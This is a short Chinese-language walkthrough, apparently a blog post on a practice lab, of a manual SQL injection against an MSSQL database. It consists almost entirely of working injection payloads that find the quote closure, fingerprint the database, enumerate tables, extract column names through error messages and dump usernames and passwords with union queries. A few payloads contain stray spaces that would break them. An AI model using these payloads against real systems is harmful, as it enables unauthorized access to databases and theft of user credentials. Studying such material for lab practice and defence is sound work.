1.判断闭合方式
闭合方式为 ’--
2.判断数据库
'and exists(select * from sysobjects)--
数据库为mssql
3.猜解有哪些表
'and (select top 1 cast (name as varchar(256)) from(select top 2 id,name from [sysobjects] where xtype=char(85) and status!=1 order by id)t order b y id desc)=1--
猜测出一张表‘users’
- 1 'and 1=(select top 1 name from sysobjects where xtype='U' and name !=' users ')--
猜测出一张表‘emails ’
- 1 'and 1=(select top 1 name from sysobjects where xtype='U' and name !=' users ' and name !=' emails ')--
猜测出一张表‘uagents’
- 1 'and 1=(select top 1 name from sysobjects where xtype='U' and name !=' users ' and name !=' emails ' and name !=' uagents ')--
猜测出一张表‘referers’
- 1 'and 1=(select top 1 name from sysobjects where xtype='U' and name !=' users ' and name !=' emails ' and name !=' uagents ' and name !=' referer s ')--
返回结果为空,说明不存在第五张表
4.爆字段
having 1=1--'group by id having 1=1--'group by id,username having 1=1--'group by id,username ,password having 1=1--
爆出字段:id,username,password
4.爆字段值
判断列数
1 'order by 3-- // 回显正常1 'order by 4-- // 回显错误
回显存在内容的字段- 1 'union select 1,2,3 from users--
查询字段内容- 1 ' union all select 1,(select top 1 username from users),' 3 '--- 1 ' union all select 1,2,(select top 1 password from users)--
完成!!!
2993
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
